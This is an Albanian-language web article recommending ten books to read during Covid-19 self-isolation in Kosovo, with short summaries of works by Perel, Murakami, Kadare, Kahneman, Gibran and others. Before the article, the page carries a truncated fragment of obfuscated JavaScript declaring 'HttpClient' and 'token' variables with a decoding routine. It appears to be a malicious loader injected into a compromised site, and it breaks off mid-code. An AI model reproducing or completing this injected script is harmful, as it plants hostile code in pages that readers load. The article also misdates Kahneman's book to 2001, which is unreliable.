;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Harrojeni kohën duke lexuar njërin nga këta libra

By

Meqenëse në Kosovë janë paraqitur  raste pozitive me Covid 19, ajo që preferohet është vetë-izolimi.

E gjatë kësaj kohë si mënyrë për të larguar vëmendjen nga situata e mediat sociale që në raste përhapin më shumë panik se informacion, më e mira që mund të bëni është të zhyteni në një libër të mirë.

Prive sjell për ju dhjetë rekomandime të librave që mund të lexoni.

Esther Perel – “As të parët, as të fundit” 

Një lexim i detyruar për të gjithë ata të cilët kanë tradhtuar, janë tradhtuar apo thjesht kanë nevojë për një strukturë të re mendore dhe emocionale me të cilën të kuptojnë lidhjet.

 Haruki Murakami – “Burrat pa Gra” 

Burrat pa Gra është një koleksion i tregimeve të shkurtra të vitit 2014 nga autori japonez Haruki Murakami, i përkthyer dhe botuar në anglisht në vitin 2017. Tregimet kanë të bëjnë me burrat që kanë humbur gratë në jetën e tyre, zakonisht te burrat e tjerë ose vdekja.

R.J Palacio – “Mrekullia”

Një novelë për fëmijë që përshkruan jetën e një djaloshi i cili ka lindur me deformitete në fytyrë. Ai nuk shkon në shkollë deri në një moshë të caktuar, por gjithçka ndryshon kur prindërit e dërgojnë në një shkollë private.

Frymëzimi për ta shkruar librin vjen nga një histori personale e autores me të birin. Novela ka marrë pëlqimin e lexuesve nga e mbarë bota dhe vlerësimi ka qenë pothuajse maksimal.

Jonathan Franzen – “Korrigjimet”

Amerikani Franzen shkruan për një familje pothuajse tradicionale amerikane – për Lambertët.

Në librin “Korrigjimet”, botuar në vitin 2001, fëmijët e familjes Lambert largohen nga shtëpia dhe secili vazhdon jetën e re në lindje të vendit.

Shkrimtari është cilësuar si njëri ndër autorët më të mirë amerikanë që e përshkruan shumë bukur konstruktin shoqëror në Amerikë.

Ismail Kadare – “Kukulla”

Libri i fundit i autorit Ismail Kadare është “Kukulla”. Kushtuar tërësisht nënës së tij, ky libër i Kadaresë është përkthyer edhe në frëngjisht. Ai flet për marrëdhënien e tij të brishtë me nënën, me të cilën s’është kuptuar asnjëherë plotësisht.

Titulli “Kukulla”  simbolizon figurës e së ëmën së tij, figurën e së cilës e përshkruan si fjalëpake dhe pothuaj të padukshme.

Daniel Kahneman – “Të menduarit shpejt dhe të menduarit ngadalë”

Psikologu izraelito-amerikan, fitues i Çmimit Nobel në Ekonomi, sjell një vepër që u shndërrua në bestseller që nga viti 2001.

“Të menduarit shpejt dhe të menduarit ngadalë” është një libër i shkruar pas disa dekadash hulumtimi nga autori.

Charles Duhigg – “Fuqia e shprehisë”

Libri më i ri nga reporteri i gazetës New York Times vjen në shqip dhe sjell eksplorimin e shkencës se si i krijojmë shprehitë dhe si manovrojmë me to si njerëz. Ai tregon nëse shprehitë mund t’i ndryshojmë dhe çka ndodh me individin kur ai arrin t’i ndryshojë ato.

JoJo Moyes – “Vajza që le pas”

Një histori dashurie. Në ngjarjen që zhvillohet në Francë në vitin 1916, artisti Edouard Lefevre lë prapa gruan e tij të re Sophie për të luftuar në frontin kundër gjermanëve.

Kur qyteti i tyre pushtohet nga gjermanët, portreti që Edouard i ka bërë asaj i bie në sy Komandantit i cili e do pikturën me çdo kusht. Më pas zbulohet se vlera e pikturës është shumë e madhe dhe aty fillon beteja.

Khalil Gibran – “Profeti”

Poeti libanez Khalil Gibran tashmë është përkthyer në 40 gjuhë e padyshim vepra e tij më e njohur është “Profeti”.

Libri është i konstruktuar në 26 proza poetike që flasin për çështjet kryesore të jetës së njeriut: Punën, Dashurinë, Martesën, Veshjen, Tregtinë, Kohën, Harenë, Dhimbjen, e të tjera.

Cheryl Strayed – “Shpirti i Egër”

Përshkruan krejt rrugëtimin e saj deri te shërimi. Libri autobiografik i amerikanes Cheryl Strayed vjen në shqip me tregimin për udhëtimin e gjatë 1500 kilometërsh nëpër rrugët e Amerikës për të gjetur paqe me veten dhe për ta harruar dhimbjen. Libri tashmë është bërë edhe film, kurse aktorja që luan rolin kryesor, Reese Witherspoon, në vitin 2015 ishte nominuar për çmimin Oscar për rolin kryesor.

 

Artikuj të ngjashëm